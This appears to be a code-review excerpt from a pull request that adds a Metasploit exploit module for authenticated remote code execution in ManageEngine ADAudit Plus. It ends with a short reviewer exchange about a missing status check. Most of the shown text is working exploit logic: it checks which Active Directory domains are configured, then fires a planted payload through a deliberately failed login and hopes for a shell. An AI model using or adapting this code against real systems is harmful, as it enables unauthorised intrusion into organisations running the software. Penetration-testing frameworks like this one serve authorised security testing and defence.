modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,595 @@
+      domain_alias_results = adaudit_plus_grab_domain_aliases(target_check_res.body)
+      domain_alias_msg = domain_alias_results['message']
+      case domain_alias_results['status']
+      when adaudit_plus_status::NO_DOMAINS
+        fail_with(Failure::NotVulnerable, domain_alias_msg)
+      when adaudit_plus_status::SUCCESS
+        # just to distinguish it from any other potential statuses that this method may return in the future
+      else
+        fail_with(Failure::Unknown, domain_alias_msg)
+      end
+
+      domain_aliases = domain_alias_results['domain_aliases']
+      if domain_aliases.blank?
+        # this shouldn't happen, but let's check this just in case
+        fail_with(Failure::Unknown, 'Failed to verify if any Active Directory domains are configured on the target.')
+      end
+
+      # if the only configured domain is the default domain, we will not be able to trigger the payload, so there is no point to proceed
+      if domain_aliases == ['ADAuditPlus Authentication']
+        fail_with(Failure::NoTarget, 'No Active Directory domains are configured on the target, so the module will not be able to trigger the payload.')
+      end
+
+      # set the domain alias to the first configured domain, unless the user provided an invalid domain
+      # in the latter case, the module won't be able to authenticate to the target so there's no point to proceed
+      if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+        vprint_status(domain_alias_msg)
+        @domain_alias = domain_aliases.first
+        print_status("Using configured authentication domain alias #{@domain_alias}.")
+      else
+        # this means the user provided an authentication domain that isn't actually configured on the target, so authentication cannot succeed
+        print_status(domain_alias_msg)
+        fail_with(Failure::BadConfig, "The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+      end
+    end
+
+    print_status("Attempting to trigger the payload via an authentication attempt for domain #{@domain_alias} using incorrect credentials.")
+    login_results = adaudit_plus_login(@domain_alias, rand_text_alphanumeric(5..8), rand_text_alphanumeric(8..12), true)
+    login_msg = login_results['message']
+    manual_trigger_msg = "You can try to manually trigger the payload via a failed login attempt for the #{@domain_alias} domain."
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED
+      fail_with(Failure::Unreachable, "#{login_msg} #{manual_trigger_msg}")
+    when adaudit_plus_status::UNEXPECTED_REPLY
+      fail_with(Failure::UnexpectedReply, "#{login_msg} #{manual_trigger_msg}")
+    when adaudit_plus_status::NO_ACCESS
+      print_status("Received expected reply when trying to trigger the payload. Let's hope we get a shell...")
+    when adaudit_plus_status::SUCCESS
```

Comment:
Missing NO_DOMAINS here.

Reply:
See my other comment. The login method is called with the fourth param set to true, in which case it cannot possibly return no_domains